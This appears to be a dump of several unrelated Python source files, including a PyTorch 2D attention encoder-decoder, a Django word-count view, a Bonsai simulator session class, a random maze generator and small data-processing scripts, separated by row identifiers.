self.ln_1 = nn.LayerNorm([v_out_channels, self.h_1, self.w_1])
self.downsample_1 = None
if self.h_1 != self.h_0 or self.w_1 != self.w_0 or channels != v_out_channels:
self.downsample_1 = nn.Conv2d(channels, v_out_channels, kernel_size=v_kernel
, stride=v_stride, padding=v_padding)
self.conv = nn.Conv2d(v_out_channels, ff_out_channels, kernel_size=ff_kernel
, stride=ff_stride, padding=ff_padding)
self.h_2, self.w_2 = (self.h_1 - ff_kernel + 2 * ff_padding) // ff_stride + 1\
, (self.w_1 - ff_kernel + 2 * ff_padding) // ff_stride + 1
self.ln_2 = nn.LayerNorm([ff_out_channels, self.h_2, self.w_2])
self.downsample_2 = None
if self.h_2 != self.h_1 or self.w_2 != self.w_1 or v_out_channels != ff_out_channels:
self.downsample_2 = nn.Conv2d(v_out_channels, ff_out_channels, kernel_size=ff_kernel
, stride=ff_stride, padding=ff_padding)
self.out_channels = ff_out_channels
self.out_h, self.out_w = self.h_2, self.w_2
def forward(self, img_seq):
# input size is (B, S, C, H, W)
img_seq = expand(img_seq, self.expansion)
temp = self.mha2d(img_seq, img_seq, img_seq)
if self.downsample_1 is not None:
img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_1) + temp, inplace=True)
else:
img_seq = F.relu(img_seq + temp, inplace=True)
img_seq = self.ln_1(img_seq)
temp = F.relu(conv_for_sequence(img_seq, self.conv), inplace=True)
if self.downsample_2 is not None:
img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_2) + temp, inplace=True)
else:
img_seq = F.relu(img_seq + temp, inplace=True)
img_seq = self.ln_2(img_seq)
return img_seq
class DecoderLayer2D(nn.Module):
def __init__(self, h, w, channels, expansion
, q1_out_channels, q1_kernel, q1_stride, q1_padding
, k1_out_channels, k1_kernel, k1_stride, k1_padding
, v1_out_channels, v1_kernel, v1_stride, v1_padding
, transform1_kernel, transform1_stride, transform1_padding
, kv_h, kv_w, kv_channels
, q2_out_channels, q2_kernel, q2_stride, q2_padding
, k2_out_channels, k2_kernel, k2_stride, k2_padding
, v2_out_channels, v2_kernel, v2_stride, v2_padding
, transform2_kernel, transform2_stride, transform2_padding
, ff_out_channels, ff_kernel, ff_stride, ff_padding
, target_h, target_w, upsample_out_channels, upsample_kernel, upsample_stride, upsample_padding):
super().__init__()
# input size is (B, S, C, H, W)
self.h_0, self.w_0 = h, w
self.expansion = expansion
self.target_h, self.target_w = target_h, target_w
self.mha2d_1 = MultiHeadAttention2D(q_in_channels=channels
, q_out_channels=q1_out_channels
, q_kernel=q1_kernel
, q_stride=q1_stride
, q_padding=q1_padding
, k_in_channels=channels
, k_out_channels=k1_out_channels
, k_kernel=k1_kernel
, k_stride=k1_stride
, k_padding=k1_padding
, v_in_channels=channels
, v_out_channels=v1_out_channels
, v_kernel=v1_kernel
, v_stride=v1_stride
, v_padding=v1_padding
, transform_kernel=transform1_kernel
, transform_stride=transform1_stride
, transform_padding=transform1_padding)
self.h_1, self.w_1 = (self.h_0 - v1_kernel + 2 * v1_padding) // v1_stride + 1\
, (self.w_0 - v1_kernel + 2 * v1_padding) // v1_stride + 1
self.ln_1 = nn.LayerNorm([v1_out_channels, self.h_1, self.w_1])
self.downsample_1 = None
if self.h_1 != self.h_0 or self.w_1 != self.w_0 or channels != v1_out_channels:
self.downsample_1 = nn.Conv2d(channels, v1_out_channels, kernel_size=v1_kernel
, stride=v1_stride, padding=v1_padding)
self.mha2d_2 = MultiHeadAttention2D(q_in_channels=v1_out_channels
, q_out_channels=q2_out_channels
, q_kernel=q2_kernel
, q_stride=q2_stride
, q_padding=q2_padding
, k_in_channels=kv_channels
, k_out_channels=k2_out_channels
, k_kernel=k2_kernel
, k_stride=k2_stride
, k_padding=k2_padding
, v_in_channels=kv_channels
, v_out_channels=v2_out_channels
, v_kernel=v2_kernel
, v_stride=v2_stride
, v_padding=v2_padding
, transform_kernel=transform2_kernel
, transform_stride=transform2_stride
, transform_padding=transform2_padding)
self.h_2, self.w_2 = (kv_h - v2_kernel + 2 * v2_padding) // v2_stride + 1\
, (kv_w - v2_kernel + 2 * v2_padding) // v2_stride + 1
self.ln_2 = nn.LayerNorm([v2_out_channels, self.h_2, self.w_2])
self.downsample_2 = None
if self.h_2 != self.h_1 or self.w_2 != self.w_1 or v1_out_channels != v2_out_channels:
self.downsample_2 = nn.Conv2d(v1_out_channels, v2_out_channels, kernel_size=v2_kernel
, stride=v2_stride, padding=v2_padding)
self.conv = nn.Conv2d(v2_out_channels, ff_out_channels, kernel_size=ff_kernel
, stride=ff_stride, padding=ff_padding)
self.h_3, self.w_3 = (self.h_2 - ff_kernel + 2 * ff_padding) // ff_stride + 1\
, (self.w_2 - ff_kernel + 2 * ff_padding) // ff_stride + 1
self.ln_3 = nn.LayerNorm([ff_out_channels, self.h_3, self.w_3])
self.downsample_3 = None
if self.h_3 != self.h_2 or self.w_3 != self.w_2 or v2_out_channels != ff_out_channels:
self.downsample_3 = nn.Conv2d(v2_out_channels, ff_out_channels, kernel_size=ff_kernel
, stride=ff_stride, padding=ff_padding)
self.out_channels = ff_out_channels
self.out_h, self.out_w = self.h_3, self.w_3
self.upsample_conv = None
if target_h is not None and target_w is not None and (target_h != self.h_3 or target_w != self.w_3):
self.upsample_conv = nn.Conv2d(ff_out_channels, upsample_out_channels
, kernel_size=upsample_kernel, stride=upsample_stride
, padding=upsample_padding)
self.out_h, self.out_w = self.target_h, self.target_w
self.out_channels = upsample_out_channels
def forward(self, img_seq, kv):
# input size is (B, S, C, H, W)
img_seq = expand(img_seq, self.expansion)
temp = self.mha2d_1(img_seq, img_seq, img_seq)
if self.downsample_1 is not None:
img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_1) + temp, inplace=True)
else:
img_seq = F.relu(img_seq + temp, inplace=True)
img_seq = self.ln_1(img_seq)
temp = self.mha2d_2(img_seq, kv, kv)
if self.downsample_2 is not None:
img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_2) + temp, inplace=True)
else:
img_seq = F.relu(img_seq + temp, inplace=True)
img_seq = self.ln_2(img_seq)
temp = F.relu(conv_for_sequence(img_seq, self.conv), inplace=True)
if self.downsample_3 is not None:
img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_3) + temp, inplace=True)
else:
img_seq = F.relu(img_seq + temp, inplace=True)
img_seq = self.ln_3(img_seq)
if self.upsample_conv is not None:
_shape = img_seq.shape
img_seq = F.interpolate(
img_seq.view(-1, _shape[2], _shape[3], _shape[4])
, (self.out_h, self.out_w)
).view(_shape[0], -1, _shape[2], self.out_h, self.out_w).contiguous()
img_seq = F.relu(conv_for_sequence(img_seq, self.upsample_conv), inplace=True)
return img_seq
class Encoder2D(nn.Module):
def __init__(self, h, w, channels, expansions):
super().__init__()
# assuming the input image size is (B, 3, 256, 256)
# input size is (B, 2, 3, 256, 256)
self.expansions = expansions
self.encoder_layer_1 = EncoderLayer2D(h=h
, w=w
, channels=channels
, expansion=expansions[0]
, q_out_channels=32
, q_kernel=7
, q_stride=2
, q_padding=0
, k_out_channels=32
, k_kernel=7
, k_stride=2
, k_padding=0
, v_out_channels=32
, v_kernel=7
, v_stride=2
, v_padding=0
, transform_kernel=1
, transform_stride=1
, transform_padding=0
, ff_out_channels=32
, ff_kernel=3
, ff_stride=1
, ff_padding=1)
# output size is (B, 2, 32, 125, 125)
# input size is (B, 2, 32, 125, 125)
self.encoder_layer_2 = EncoderLayer2D(h=self.encoder_layer_1.out_h
, w=self.encoder_layer_1.out_w
, channels=self.encoder_layer_1.out_channels
, expansion=expansions[1]
, q_out_channels=32
, q_kernel=7
, q_stride=2
, q_padding=0
, k_out_channels=32
, k_kernel=7
, k_stride=2
, k_padding=0
, v_out_channels=32
, v_kernel=7
, v_stride=2
, v_padding=0
, transform_kernel=1
, transform_stride=1
, transform_padding=0
, ff_out_channels=32
, ff_kernel=3
, ff_stride=1
, ff_padding=1)
# output size is (B, 4, 32, 60, 60)
# input size is (B, 4, 32, 60, 60)
self.encoder_layer_3 = EncoderLayer2D(h=self.encoder_layer_2.out_h
, w=self.encoder_layer_2.out_w
, channels=self.encoder_layer_2.out_channels
, expansion=expansions[2]
, q_out_channels=64
, q_kernel=7
, q_stride=2
, q_padding=0
, k_out_channels=64
, k_kernel=7
, k_stride=2
, k_padding=0
, v_out_channels=64
, v_kernel=7
, v_stride=2
, v_padding=0
, transform_kernel=1
, transform_stride=1
, transform_padding=0
, ff_out_channels=64
, ff_kernel=3
, ff_stride=1
, ff_padding=1)
# output size is (B, 8, 64, 27, 27)
def forward(self, img_seq):
embeddings = []
img_seq = self.encoder_layer_1(img_seq)
embeddings.append(img_seq)
img_seq = self.encoder_layer_2(img_seq)
embeddings.append(img_seq)
img_seq = self.encoder_layer_3(img_seq)
embeddings.append(img_seq)
return embeddings
class Decoder2D(nn.Module):
def __init__(self, h, w, channels, kvs_h, kvs_w, kvs_channels):
super().__init__()
# use upsampling + conv instead of deconv
# the upsampling + conv is performed in the layer after multi-head attention
# assuming the input scope size is (B, 1, 1, 256, 256)
# input size is (B, 1, 1, 256, 256)
self.encoder = Encoder2D(h, w, channels, [1, 1, 1])
# output size is (B, 1, 64, 27, 27)
# input q size is (B, 1, 64, 27, 27)
# input kv size is (B, 8, 64, 27, 27)
self.decoder_layer_1 = DecoderLayer2D(h=self.encoder.encoder_layer_3.out_h
, w=self.encoder.encoder_layer_3.out_w
, channels=self.encoder.encoder_layer_3.out_channels
, expansion=1
, q1_out_channels=64
, q1_kernel=7
, q1_stride=1
, q1_padding=3
, k1_out_channels=64
, k1_kernel=7
, k1_stride=1
, k1_padding=3
, v1_out_channels=64
, v1_kernel=7
, v1_stride=1
, v1_padding=3
, transform1_kernel=1
, transform1_stride=1
, transform1_padding=0
, kv_h=kvs_h[-1]
, kv_w=kvs_w[-1]
, kv_channels=kvs_channels[-1]
, q2_out_channels=64
, q2_kernel=7
, q2_stride=1
, q2_padding=3
, k2_out_channels=64
, k2_kernel=7
, k2_stride=1
, k2_padding=3
, v2_out_channels=64
, v2_kernel=7
, v2_stride=1
, v2_padding=3
, transform2_kernel=1
, transform2_stride=1
, transform2_padding=0
, ff_out_channels=64
, ff_kernel=3
, ff_stride=1
, ff_padding=1
, target_h=kvs_h[-2]
, target_w=kvs_w[-2]
, upsample_out_channels=kvs_channels[-2]
, upsample_kernel=3
, upsample_stride=1
, upsample_padding=1)
# output size is (B, 1, 32, 60, 60)
# input size is (B, 1, 32, 60, 60)
# input kv size is (B, 4, 32, 60, 60)
self.decoder_layer_2 = DecoderLayer2D(h=self.decoder_layer_1.out_h
, w=self.decoder_layer_1.out_w
, channels=self.decoder_layer_1.out_channels
, expansion=1
, q1_out_channels=32
, q1_kernel=7
, q1_stride=1
, q1_padding=3
, k1_out_channels=32
, k1_kernel=7
, k1_stride=1
, k1_padding=3
, v1_out_channels=32
, v1_kernel=7
, v1_stride=1
, v1_padding=3
, transform1_kernel=1
, transform1_stride=1
, transform1_padding=0
, kv_h=kvs_h[-2]
, kv_w=kvs_w[-2]
, kv_channels=kvs_channels[-2]
, q2_out_channels=32
, q2_kernel=7
, q2_stride=1
, q2_padding=3
, k2_out_channels=32
, k2_kernel=7
, k2_stride=1
, k2_padding=3
, v2_out_channels=32
, v2_kernel=7
, v2_stride=1
, v2_padding=3
, transform2_kernel=1
, transform2_stride=1
, transform2_padding=0
, ff_out_channels=32
, ff_kernel=3
, ff_stride=1
, ff_padding=1
, target_h=kvs_h[-3]
, target_w=kvs_w[-3]
, upsample_out_channels=kvs_channels[-3]
, upsample_kernel=3
, upsample_stride=1
, upsample_padding=1)
# output size is (B, 1, 32, 125, 125)
# input size is (B, 1, 32, 125, 125)
# input kv size is (B, 2, 32, 125, 125)
self.decoder_layer_3 = DecoderLayer2D(h=self.decoder_layer_2.out_h
, w=self.decoder_layer_2.out_w
, channels=self.decoder_layer_2.out_channels
, expansion=1
, q1_out_channels=32
, q1_kernel=7
, q1_stride=1
, q1_padding=3
, k1_out_channels=32
, k1_kernel=7
, k1_stride=1
, k1_padding=3
, v1_out_channels=32
, v1_kernel=7
, v1_stride=1
, v1_padding=3
, transform1_kernel=1
, transform1_stride=1
, transform1_padding=0
, kv_h=kvs_h[-3]
, kv_w=kvs_w[-3]
, kv_channels=kvs_channels[-3]
, q2_out_channels=32
, q2_kernel=7
, q2_stride=1
, q2_padding=3
, k2_out_channels=32
, k2_kernel=7
, k2_stride=1
, k2_padding=3
, v2_out_channels=32
, v2_kernel=7
, v2_stride=1
, v2_padding=3
, transform2_kernel=1
, transform2_stride=1
, transform2_padding=0
, ff_out_channels=16
, ff_kernel=3
, ff_stride=1
, ff_padding=1
, target_h=h
, target_w=w
, upsample_out_channels=8
, upsample_kernel=3
, upsample_stride=1
, upsample_padding=1)
# output size is (B, 1, 8, 256, 256)
def forward(self, img_seq, embeddings):
img_seq = self.encoder(img_seq)[-1]
img_seq = self.decoder_layer_1(img_seq, embeddings[-1])
img_seq = self.decoder_layer_2(img_seq, embeddings[-2])
img_seq = self.decoder_layer_3(img_seq, embeddings[-3])
return img_seq
class AirTransformer2D(nn.Module):
def __init__(self, steps):
super().__init__()
self.steps = steps
self.encoder = Encoder2D(256, 256, 3, [2, 2, 2])
self.decoder = Decoder2D(256, 256, 1, [125, 60, 27], [125, 60, 27], [32, 32, 64])
self.conv = nn.Conv2d(12, 1, kernel_size=1, stride=1, padding=0)
def forward(self, imgs, scopes):
img_seq = torch.unsqueeze(imgs, 1)
scope_seq = torch.unsqueeze(scopes, 1)
embeddings = self.encoder(img_seq)
mask_seq = []
for idx in range(self.steps):
masks = torch.sigmoid(self.conv(torch.cat((imgs, scopes, self.decoder(scope_seq, embeddings).squeeze(dim=1)), dim=1)))
scopes = (1 - masks) * scopes
scope_seq = torch.unsqueeze(scopes, 1)
mask_seq.append(masks)
return torch.stack(mask_seq, dim=1)
|
996,824 | 2223aec1e4b37724251b8fc3506645787b877345 | from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['Related', 'RelatedInterface']
class RelatedInterface(ApiInterfaceBase):
name: AnyType
id: int
type: AnyType
class Related(PropertyMapper, RelatedInterface):
pass
|
996,825 | dbccf38dd819e947232e5cef74eb52ff5709f46c | # Given a list of numbers and a number k, return whether any two numbers from the list add up to k.
# For example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.
# Bonus: Can you do this in one pass?
array = [10, 15, 3, 7]
k = 16
array.sort()
print(array)
def doNumbersAddUp(array, k):
for i in range(len(array)):
for j in range(len(array)):
if (array[i] + array[j]) == k:
return True
return False
print(doNumbersAddUp(array, k))
|
996,826 | 39ba870f705f9edb3932fbea0c902182891062bb | from django.http import HttpResponse
from django.shortcuts import render
def home(request):
return render(request,'home.html')
def count(request):
s = request.GET['fulltext']
count = [x for x in s.split(' ')]
if count[0]!='':
l = len(count)
return render(request,'count.html',{ 'l' : l, 'fulltext' : s})
else:
return render(request,'Notfound.html')
def about(request):
return render(request,'about.html') |
996,827 | e9ecc0a06269ca7b2e9b02c4bb224b2c92cbf32c | """
Simulator session base class for bonsai3 library
"""
__copyright__ = "Copyright 2020, Microsoft Corp."
# pyright: strict
import abc
import logging
import sys
import numpy as np
import signal
import time
from functools import partial
from types import FrameType
from typing import Dict, Any, Optional, List
import jsons
from microsoft_bonsai_api.simulator.client import BonsaiClient, BonsaiClientConfig
from microsoft_bonsai_api.simulator.generated.models import (
Event,
EventType,
SimulatorInterface,
SimulatorSessionResponse,
SimulatorState,
)
logFormatter = "[%(asctime)s][%(levelname)s] %(message)s"
logging.basicConfig(format=logFormatter, datefmt="%Y-%m-%d %H:%M:%S")
log = logging.getLogger(__name__)
log.setLevel(level=logging.INFO)
Schema = Dict[str, Any]
def default_numpy_bool_serializer(np_bool: np.bool_, **kwargs: Dict[str, Any]) -> bool:
"""
Serialize the given numpy bool instance to a native python object.
:param np_obj: the numpy object instance that is to be serialized.
:param kwargs: not used.
:return: native python object equivalent to the numpy object representation.
"""
return np_bool.item()
jsons.set_serializer(default_numpy_bool_serializer, np.bool_)
def default_numpy_number_serializer(
np_number: np.number, **kwargs: Dict[str, Any]
) -> object:
"""
Serialize the given numpy number instance to a native python object.
:param np_obj: the numpy object instance that is to be serialized.
:param kwargs: not used.
:return: native python object equivalent to the numpy object representation.
"""
return np_number.item()
jsons.set_serializer(default_numpy_number_serializer, np.number)
def default_numpy_array_serializer(
np_array: np.ndarray, **kwargs: Dict[str, Any]
) -> List[Any]:
"""
Serialize the given numpy object instance to a string. It uses
str because all numpy object str representation are compatible
with the Python built-in equivalent.
:param np_obj: the numpy object instance that is to be serialized.
:param kwargs: not used.
:return: str with the numpy object representation.
"""
native_list = np_array.tolist()
return jsons.default_iterable_serializer(native_list, **kwargs)
jsons.set_serializer(default_numpy_array_serializer, np.ndarray)
class SimulatorSession(abc.ABC):
_registered = None # type: Optional[SimulatorSessionResponse]
_sequence_id = 1 # type: int
_last_event = None # type: Optional[Event]
def __init__(self, config: BonsaiClientConfig, *, log_dispatch: bool = True):
self._config = config
self._registered = None
self._client = BonsaiClient(config)
self._sequence_id = 1
self._log_dispatch = log_dispatch
@property
def attach_to_sigterm(self):
"""Indicates if the session should handle the sigterm.
By default we are handling the sigterm but a subclass
could override this property to change the behavior.
"""
return True
# interface and state
def get_state(self) -> Schema:
"""Called to retreive the current state of the simulator. """
raise NotImplementedError("get_state not implemented.")
def get_interface(self) -> SimulatorInterface:
"""Called to retreive the simulator interface during registration. """
raise NotImplementedError("get_interface not implemented.")
def get_simulator_context(self) -> str:
"""
Called to retrieve the simulator context field for the SimulatorInterface.
"""
return self._config.simulator_context or ""
def halted(self) -> bool:
"""
Should return weather the episode is halted, and
no further action will result in a state.
"""
raise NotImplementedError("halted not implemented.")
# callbacks
def registered(self):
"""Called after simulator is successfully registered. """
log.info("Registered.")
pass
@abc.abstractmethod
def episode_start(self, config: Schema) -> None:
"""Called at the start of each episode. """
raise NotImplementedError("episode_start not implemented.")
@abc.abstractmethod
def episode_step(self, action: Schema) -> None:
"""Called for each step of the episode. """
raise NotImplementedError("episode_step not implemented.")
def episode_finish(self, reason: str) -> None:
"""Called at the end of an episode. """
pass
def idle(self, callback_time: float):
"""Called when the simulator should idle and perform no action. """
log.info("Idling for {} seconds...".format(callback_time))
if callback_time > 0:
time.sleep(callback_time)
def unregistered(self, reason: str):
"""Called when the simulator has been unregistered and should exit. """
log.info("Unregistered, Reason: {}".format(reason))
pass
def run(self) -> bool:
"""
Runs simulator. Returns false when the simulator should exit.
Example usage:
...
mySim = MySimulator(config)
while mySim.run():
continue
...
returns True if the simulator should continue.
returns False if the simulator should exit its simulation loop.
"""
# Boolean used to determine if we should attempt to unregister simulator
unregister = False
try:
if self._registered is None:
log.info("Registering Sim")
self._registered = self._client.session.create(
self._config.workspace, self.get_interface()
)
# Attach SIGTERM handler to attempt to unregister sim when a SIGTERM is detected
if self.attach_to_sigterm and (
sys.platform == "linux" or sys.platform == "darwin"
):
signal.signal(
signal.SIGTERM, partial(_handleSIGTERM, sim_session=self)
)
self.registered()
return True
else:
session_id = self._registered.session_id
# TODO: Figure out what to do here. Moab sim has a complex type in it's
# state (numpy.float)
# Workaround is the following two lines and the custom jsons
# serializer added at the begging of the module. The swagger
# libraries do not like it.
original_state = self.get_state()
state = jsons.dumps(original_state)
state = jsons.loads(state)
sim_state = SimulatorState(
sequence_id=self._sequence_id,
state=state,
halted=self.halted(),
)
self._last_event = self._client.session.advance(
self._config.workspace, session_id, body=sim_state
) # # type: Event
self._sequence_id = self._last_event.sequence_id
if self._log_dispatch:
log.info("Received event: {}".format(self._last_event.type))
keep_going = self._dispatch_event(self._last_event)
if keep_going is False:
log.debug(
"Setting flag to indicate that sim should attempt to unregister."
)
unregister = True
return keep_going
except KeyboardInterrupt:
unregister = True
except Exception as err:
unregister = True
log.exception("Exiting due to the following error: {}".format(err))
raise err
finally:
if unregister:
self.unregister()
return False
def _dispatch_event(self, event: Event) -> bool:
"""
Examines the SimulatorEvent and calls one of the
dispatch functions for the appropriate event.
return false if there are no more events.
"""
if event.type == EventType.episode_start.value and event.episode_start:
self.episode_start(event.episode_start.config)
elif event.type == EventType.episode_step.value and event.episode_step:
self.episode_step(event.episode_step.action)
elif event.type == EventType.episode_finish.value and event.episode_finish:
self.episode_finish(event.episode_finish.reason)
elif event.type == EventType.idle.value and event.idle:
try:
self.idle(event.idle.callback_time)
except AttributeError:
# callbacktime is always 0. Sometimes the attribute is missing.
# Idle for 0 seconds if attribute is missing.
self.idle(0)
elif event.type == EventType.unregister.value and event.unregister:
log.info("Unregister reason: {}.".format(event.unregister.reason))
return False
return True
def unregister(self):
""" Attempts to unregister simulator session"""
if self._registered:
try:
log.info("Attempting to unregister simulator.")
self._client.session.delete(
self._config.workspace,
session_id=self._registered.session_id,
)
if (
self._last_event is not None
and self._last_event.type == EventType.unregister.value
and self._last_event.unregister
):
self.unregistered(self._last_event.unregister.reason)
log.info("Successfully unregistered simulator.")
except Exception as err:
log.error("Unregister simulator failed with error: {}".format(err))
def _handleSIGTERM(
signalType: int, frame: FrameType, sim_session: SimulatorSession
) -> None:
""" Attempts to unregister sim when a SIGTERM signal is detected """
log.info("Handling SIGTERM.")
sim_session.unregister()
log.info("SIGTERM Handled, exiting.")
sys.exit()
|
996,828 | fde23e8d38fdc0f4c083b002217088a5f6fe32fa | """This file contains functions to randomly generate mazes.
The main function in this file is generate_random_maze_matrix(), which generates
a maze with no dead ends and no open squares.
"""
import numpy as np
# Maximum iteration through a while loop
_MAX_ITERS = int(1e5)
def _get_neighbors(size, point):
"""Get indices of point's neighbors in square matrix of size `size`.
Unless point (i, j) is on the boundary of the size x size square, this will
be a list of 4 elements.
Args:
size: Int.
point: Tuple of ints (i, j). Must satisfy 0 <= i, j < size.
Returns:
neighbors: List of tuples. Length 2 (if point is a corner), 3 (if point
is on an edge), or 4 (if point is in the interior).
"""
i, j = point
neighbors = [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)]
_valid_neighbor = lambda neighbor: all(0 <= x < size for x in neighbor)
neighbors = list(filter(_valid_neighbor, neighbors))
return neighbors
def _get_containing_blocks(size, point):
"""Get 2x2 blocks containing point in open maze of size `size`.
Unless point is on the boundary of the size x size square, there will be 4
containing 2x2 blocks.
Args:
size: Int.
point: Tuple of ints (i, j). Must satisfy 0 <= i, j < size.
Returns:
block_inds: List of tuples. If (k, l) is in block_inds, then point
(i, j) is in {(k, l), (k + 1, l), (k, l + 1), (k + 1, l + 1)}.
"""
i, j = point
block_inds = []
if i > 0:
if j > 0:
block_inds.append((i - 1, j - 1))
if j < size - 1:
block_inds.append((i - 1, j))
if i < size - 1:
if j > 0:
block_inds.append((i, j - 1))
if j < size - 1:
block_inds.append((i, j))
return block_inds
def _remove_dead_ends(maze):
"""Iteratively remove the dead ends in the maze.
This is done in place, and by the time this function returs there will be no
open points with fewer than 2 open neighbors, i.e. no dead ends in the maze.
Args:
maze: N x N binary matrix.
"""
def _fill_maze():
# Fill in dead ends, return True if the maze has no dead ends, otherwise
# False.
size = maze.shape[0]
for i in range(size):
for j in range(size):
if maze[i, j]: # Not an open point
continue
num_open_neighbors = np.sum(
[1 - maze[n[0], n[1]]
for n in _get_neighbors(size, (i, j))])
if num_open_neighbors < 2:
maze[i, j] = 1
return False
return True
valid_maze = False
while not valid_maze:
valid_maze = _fill_maze()
def generate_random_maze_matrix(size, ambient_size=None):
"""Generate a random maze matrix.
The maze matrix generated has no open points (e.g. no four open cells
sharing a vertex), no dead ends (e.g. each open point has at least two open
neighbors), and is one connected component.
The way this generator works is it starts will a single open cell (all other
cells are walls). Then it iteratively adds closed neighbors, as long as
opening them doesn't open up a block. Once there are no more such neighbors,
it iteratively fills in all dead ends. The result is the final maze matrix
(unless it is all walls, in which case the function recurses to try again).
Args:
size: Int. Size (height and width) of the maze.
ambient_size: Size of the final maze matrix. This can be larger than
`size` to add some visible wall border around the maze. If None, no
wall border around the maze is produced.
"""
maze = np.ones((size, size))
# Start from a random point and recursively open points
closed_neighbors = [] # Closed points that are neighbors of open points
def _open_point(point):
# Open a point and add its neighbors to closed_neighbors
for p in _get_neighbors(size, point):
if maze[p[0], p[1]] and p not in closed_neighbors:
closed_neighbors.append(p)
maze[point[0], point[1]] = 0
def _find_and_open_new_point():
# Find a closed neighbor that can be opened without creating an open
# block, open it, and return True. If no such point exists, return
# False.
np.random.shuffle(closed_neighbors)
for new_point in closed_neighbors:
if not maze[new_point[0], new_point[1]]:
continue
will_make_open_block = any([
np.sum(maze[i: i + 2, j: j + 2]) <= 1
for i, j in _get_containing_blocks(size, new_point)
])
if not will_make_open_block:
_open_point(new_point)
return True
return False
# Seed the maze and iteratively open points
_open_point(tuple(np.random.randint(0, size, size=(2,))))
points_to_add = True
while points_to_add:
points_to_add = _find_and_open_new_point()
# Remove dead ends
_remove_dead_ends(maze)
# If maze has no open points, recurse to generate a new one
if np.sum(1 - maze) == 0:
return generate_random_maze_matrix(size, ambient_size=ambient_size)
# Add wall border if necessary
if ambient_size is not None and ambient_size > size:
maze_with_border = np.ones((ambient_size, ambient_size))
start_index = (ambient_size - size) // 2
maze_with_border[start_index: start_index + size,
start_index: start_index + size] = maze
maze = maze_with_border
return maze
def _generate_open_blob(maze, num_points):
"""Try to generate an open connected blob of points in the maze.
Args:
maze: Instance of .maze.Maze.
num_points: Int. Number of connected points to have in the blob.
Returns:
blob_matrix: False or binary matrix of same size as maze. Ones
correspond to points in the connected open blob. If False, then
could not generate a valid blob.
"""
neighbor_dict = maze.get_neighbor_dict()
# Seed the blob with a starting point
blob = [maze.sample_open_point()]
def _get_candidate_new_blob_point():
# New potential new blob point from neighbors of existing blob point
candidate_root = blob[np.random.randint(len(blob))] #pylint: disable=invalid-sequence-index
neighbors = neighbor_dict[candidate_root]
candidate = neighbors[np.random.randint(len(neighbors))]
return candidate
def _add_point():
# Add a new point to the blob, returning True/False depending on whether
# this was successful.
valid_candidate = False
count = 0
while not valid_candidate:
count += 1
candidate = _get_candidate_new_blob_point()
if not candidate or candidate in blob:
continue
else:
valid_candidate = True
if count > _MAX_ITERS:
return False
blob.append(candidate)
return True
# Add num_points points to the blob if possible, else return False.
for _ in range(num_points - 1):
able_to_add_point = _add_point()
if not able_to_add_point:
return False
# Convert the list of blob points to a matrix
blob_matrix = np.zeros_like(maze.maze)
for (i, j) in blob:
blob_matrix[i, j] = 1
return blob_matrix
def get_connected_open_blob(maze, num_points):
"""Generate an open connected blob of `num_points` points in the maze.
Args:
maze: Instance of .maze.Maze.
num_points: Int. Number of connected points to have in the blob.
Returns:
blob_matrix: Binary matrix of same size as maze. Ones correspond to
points in the connected open blob.
"""
valid_blob = False
count = 0
while not valid_blob:
count += 1
if count > _MAX_ITERS:
raise ValueError('Could not generate an open connected blob.')
blob_matrix = _generate_open_blob(maze, num_points)
if not isinstance(blob_matrix, bool):
valid_blob = True
return blob_matrix
|
996,829 | ab806de07d36635a59e031b610df681023383076 | import plotly.express as px
import csv
import numpy as np
def getDataSource( data_path):
marks_In_Percentage = []
days_Present= []
with open(data_path) as csv_file:
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
marks_In_Percentage.append( float(row["Marks In Percentage"]))
days_Present.append(float(row["Days Present"]))
return { "x" : marks_In_Percentage , "y" : days_Present}
def findCorrelation(datasource):
correlation = np.corrcoef( datasource["x"] , datasource["y"])
print(correlation[0,1])
def setup():
dp = "Student Marks vs Days Present.csv"
ds = getDataSource( dp )
findCorrelation(ds)
setup()
|
996,830 | 4aaeab4316c3a6bc95edf87068fde3f5c7c537b3 | # -*- coding: utf-8 -*-
from PyQt5 import QtWidgets
from src.ui.main_ui.UiMain import UiMain
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = UiMain()
MainWindow.show()
sys.exit(app.exec_())
|
996,831 | 477e3dc397ea14d7cf57b9698384ca1710dfbed0 | x = min(inp[2*cur+2], inp[2*cur+1])
inp[cur] = x
inp[2*cur+1] -= x
i |
996,832 | 8e8bf0475245def7ea91df0d00778c5ae43ab658 | from django.urls import path
from . import views
urlpatterns = [
path('', views.carros, name='carros'),
path('<int:id>', views.car_detalle, name='car_detalle'),
path('search', views.search, name='search'),
]
|
996,833 | e3e76a7a012188beb4426b0f036fe1206d8b7261 | #!/usr/bin/env python
# encoding: utf-8
"""
filter-hospitals.py
Created by Christian Swinehart on 2019/11/26.
Copyright (c) 2019 Samizdat Drafting Co. All rights reserved.
"""
import os
from csv import DictReader, DictWriter
_root = os.path.dirname(os.path.abspath(__file__))
def main():
# read in the whole huge csv
reader = DictReader(open('data/HospitalLocationsLg.csv'))
headers = reader.fieldnames
# create a new csv file to which we'll add any rows from the original that make the cut
with open('data/HospitalLocationsGeneral.csv', 'w') as f:
writer = DictWriter(f, fieldnames=headers)
writer.writeheader()
# step through each of the rows from the original
for row in reader:
# test whether the value for the column of interest is the one we're looking for
# and if so, write that row to the new csv file. otherwise, just skip it
if row['NAICS_DESC'] == 'GENERAL MEDICAL AND SURGICAL HOSPITALS':
writer.writerow(row)
print 'wrote matching rows to', f.name
if __name__ == "__main__":
os.chdir(_root)
main()
|
996,834 | ed7114f96a31a9c34e7f85baed34fe19f612704a | '''
Here we train spell checker model which is Seq2Seq model
based on different operations in 2 Levenstein len
'''
from zipfile import ZipFile, ZIP_DEFLATED
from io import BytesIO
import torch
import time
import numpy as np
import math
import yaml
import shutil
import sys
import random
import re
import os
import transformer
import pickle
from pathlib import Path
import json
import argparse
from transformers import get_linear_schedule_with_warmup
from torchtext.vocab import Vocab, vocab
from collections import OrderedDict, Counter
from dataset import Seq2SeqDataset
from torch.utils.data import DataLoader
from utils import cer, accuracy
import string
import wandb
import pickle
import re
